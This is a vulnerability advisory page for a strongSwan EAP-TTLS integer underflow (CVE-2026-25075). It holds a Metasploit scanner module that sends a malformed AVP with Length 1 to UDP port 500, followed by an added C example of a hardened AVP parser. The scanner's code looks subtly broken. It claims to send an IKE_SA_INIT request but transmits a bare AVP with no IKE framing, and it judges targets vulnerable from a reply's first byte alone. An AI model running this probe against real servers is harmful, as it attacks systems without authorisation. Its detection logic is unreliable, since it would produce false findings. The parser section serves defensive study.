strongSwan 4.5.0 EAP-TTLS Integer Underflow

Published: 11 May 2026 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news
Views: 47

Detects CVE-2026-25075, an integer underflow in the AVP (Attribute-Value Pair) Length handling of strongSwan's EAP-TTLS (EAP-Tunneled Transport Layer Security) implementation, by sending an AVP header whose Length field is 1.

Related

Family        | Title                                                                            | Published         | Source
ATTACKERKB    | CVE-2026-25075                                                                   | 23 Mar 2026 18:33 | attackerkb
GithubExploit | Exploit for CVE-2026-25075                                                       | 26 Mar 2026 17:16 | githubexploit
CBLMariner    | CVE-2026-25075 affecting package strongswan for versions less than 5.9.14-9      | 25 Mar 2026 22:53 | cbl_mariner
Circl         | CVE-2026-25075                                                                   | 23 Mar 2026 19:23 | circl
CNNVD         | strongSwan code issue vulnerability                                              | 23 Mar 2026 00:00 | cnnvd
CVE           | CVE-2026-25075                                                                   | 23 Mar 2026 18:33 | cve
Cvelist       | CVE-2026-25075 strongSwan 4.5.0 < 6.0.5 EAP-TTLS AVP Parsing Integer Underflow   | 23 Mar 2026 18:33 | cvelist
Debian        | [SECURITY] [DLA 4512-1] strongswan security update                               | 27 Mar 2026 18:21 | debian
Debian        | [SECURITY] [DSA 6176-1] strongswan security update                               | 23 Mar 2026 17:07 | debian
Debian CVE    | CVE-2026-25075                                                                   | 23 Mar 2026 18:33 | debiancve
    ==================================================================================================================================
    | # Title     : strongSwan 4.5.0 EAP-TTLS Integer Underflow Vulnerability Scanner                                                |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://strongswan.org/                                                                                          |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module detects a vulnerability in strongSwan's EAP-TTLS implementation, identified as CVE-2026-25075.
                     The issue is an integer underflow in the handling of the AVP (Attribute-Value Pair) Length field, reached over IKE-related UDP communication.
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::Udp
      include Msf::Auxiliary::Scanner
      include Msf::Auxiliary::Report

      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'strongSwan EAP-TTLS AVP Integer Underflow Scanner',
            'Description' => %q{
              This module checks for CVE-2026-25075, an integer underflow in strongSwan's
              handling of the EAP-TTLS AVP Length field. It sends a single AVP header whose
              Length field is 1 (smaller than the 8-byte header itself) and carries no data,
              which is sufficient to detect the flaw without crashing the server.
            },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2026-25075'],
              ['URL', 'https://www.strongswan.org/']
            ],
            'DisclosureDate' => '2026-02-15',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [],
              'SideEffects' => []
            }
          )
        )

        register_options(
          [
            Opt::RPORT(500),
            OptInt.new('IKE_TIMEOUT', [true, 'IKE request response timeout in seconds', 5])
          ]
        )
      end

      # Builds an 8-byte EAP-TTLS AVP header with no payload:
      # Code: 79 (EAP-Message), Flags: 0x40 (Mandatory), Length: 1
      # The Length field is 3 bytes wide and normally counts the header itself,
      # so a value of 1 is smaller than the minimum header size.
      def craft_test_avp
        [79].pack('N') + [0x40].pack('C') + [1].pack('N')[1, 3]
      end

      def run_host(ip)
        vprint_status("#{ip} - Starting the CVE-2026-25075 scan...")

        begin
          connect_udp

          print_status("#{ip} - Sending an IKE_SA_INIT request...")
          test_packet = craft_test_avp
          udp_sock.put(test_packet)

          res = udp_sock.get(datastore['IKE_TIMEOUT'])

          if res
            if is_vulnerable?(res)
              print_good("#{ip} - Target is vulnerable to CVE-2026-25075!")
              report_vuln(
                host: ip,
                name: self.name,
                refs: self.references,
                info: 'Server accepted AVP with invalid length (Integer Underflow)'
              )
            else
              vprint_status("#{ip} - Server correctly rejected the packet.")
            end
          else
            vprint_error("#{ip} - No response received from the server.")
          end
        rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED
          vprint_error("#{ip} - Unable to connect to UDP port #{datastore['RPORT']}")
        ensure
          disconnect_udp
        end
      end

      # Treats any non-empty response whose first byte is 1 as acceptance of the malformed AVP.
      def is_vulnerable?(data)
        return false unless data && !data.empty?

        data.unpack1('C') == 1
      end
    end
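    The module above relies on the fact that an AVP Length of 1 is below the 8-byte header it is supposed to cover. The following C program is an added example (not strongSwan's code, and not part of the original advisory) that parses an RFC 5281 EAP-TTLS AVP header, isolates the unchecked `Length - header` subtraction that produces the underflow, and shows the check a hardened parser applies before using the length. The byte samples are constructed for the example: the 8-byte probe the scanner sends, a well-formed EAP-Message AVP, and a vendor-specific AVP whose Length is below its own 12-byte header.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example (not strongSwan code): RFC 5281 EAP-TTLS AVP header layout is
 * Code (4 bytes), Flags (1 byte), Length (3 bytes, counts header plus data),
 * then an optional Vendor-ID (4 bytes) when the V flag (0x80) is set. */
#define AVP_FLAG_VENDOR 0x80
#define AVP_HEADER_LEN  8u
#define AVP_VENDOR_LEN  4u

typedef struct {
    uint32_t code;
    uint8_t  flags;
    uint32_t length;     /* raw 24-bit Length field */
    uint32_t vendor_id;  /* 0 when the V flag is clear */
    size_t   data_len;   /* payload bytes following the header */
} avp_t;

/* The bug class in isolation: subtracting the header size from an unchecked
 * Length in unsigned arithmetic. Length = 1 wraps to 0xFFFFFFF9. */
uint32_t avp_unchecked_data_len(uint32_t length, uint32_t header_len)
{
    return length - header_len;
}

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Hardened parser: returns 0 on success, -1 on any malformed header. */
int avp_parse(const uint8_t *buf, size_t buf_len, avp_t *out)
{
    if (buf == NULL || out == NULL || buf_len < AVP_HEADER_LEN)
        return -1;
    memset(out, 0, sizeof(*out));
    out->code   = be32(buf);
    out->flags  = buf[4];
    out->length = ((uint32_t)buf[5] << 16) | ((uint32_t)buf[6] << 8) | (uint32_t)buf[7];

    uint32_t header_len = AVP_HEADER_LEN;
    if (out->flags & AVP_FLAG_VENDOR) {
        header_len += AVP_VENDOR_LEN;
        if (buf_len < header_len)
            return -1;
        out->vendor_id = be32(buf + 8);
    }
    /* The check that defuses the underflow: Length must at least cover the header. */
    if (out->length < header_len)
        return -1;
    /* And the whole AVP must fit inside what was actually received. */
    if (out->length > buf_len)
        return -1;
    out->data_len = out->length - header_len;
    return 0;
}

/* Constructed samples (not captured traffic). */
/* The 8-byte probe the scanner sends: Code 79, Flags 0x40, Length 1. */
static const uint8_t SAMPLE_LENGTH_ONE[8] =
    { 0x00, 0x00, 0x00, 0x4F, 0x40, 0x00, 0x00, 0x01 };
/* A well-formed EAP-Message AVP carrying 4 payload bytes (Length 12). */
static const uint8_t SAMPLE_VALID[12] =
    { 0x00, 0x00, 0x00, 0x4F, 0x40, 0x00, 0x00, 0x0C, 'a', 'b', 'c', 'd' };
/* Vendor-specific AVP whose Length (8) is below its own 12-byte header. */
static const uint8_t SAMPLE_VENDOR_SHORT[12] =
    { 0x00, 0x00, 0x00, 0x4F, 0xC0, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x05 };

int sample_length_one_rejected(void)
{
    avp_t a;
    return avp_parse(SAMPLE_LENGTH_ONE, sizeof SAMPLE_LENGTH_ONE, &a) == -1;
}

int sample_vendor_short_rejected(void)
{
    avp_t a;
    return avp_parse(SAMPLE_VENDOR_SHORT, sizeof SAMPLE_VENDOR_SHORT, &a) == -1;
}

/* Payload length of the valid sample, or (size_t)-1 if the parser rejects it. */
size_t sample_valid_data_len(void)
{
    avp_t a;
    if (avp_parse(SAMPLE_VALID, sizeof SAMPLE_VALID, &a) != 0)
        return (size_t)-1;
    return a.data_len;
}

int main(void)
{
    printf("unchecked data length for Length=1: 0x%08X\n",
           avp_unchecked_data_len(1, AVP_HEADER_LEN));
    printf("Length=1 header rejected: %d\n", sample_length_one_rejected());
    printf("vendor AVP with Length=8 rejected: %d\n", sample_vendor_short_rejected());
    printf("valid AVP payload bytes: %zu\n", sample_valid_data_len());
    return 0;
}
```

The two ordering points matter: the minimum-length check must use the header size that applies after the V flag has been read (12 bytes, not 8, for vendor-specific AVPs), and it must run before any arithmetic on Length, since the wrapped value would otherwise pass a later bounds check that compares it against an equally large buffer size.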
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================


Scores (current as of 11 May 2026 00:00):
Risk: 6 (Medium)
Vulners AI Score: 6
CVSS 3.1: 7.5
CVSS 4: 8.7
EPSS: 0.00248
SSVC: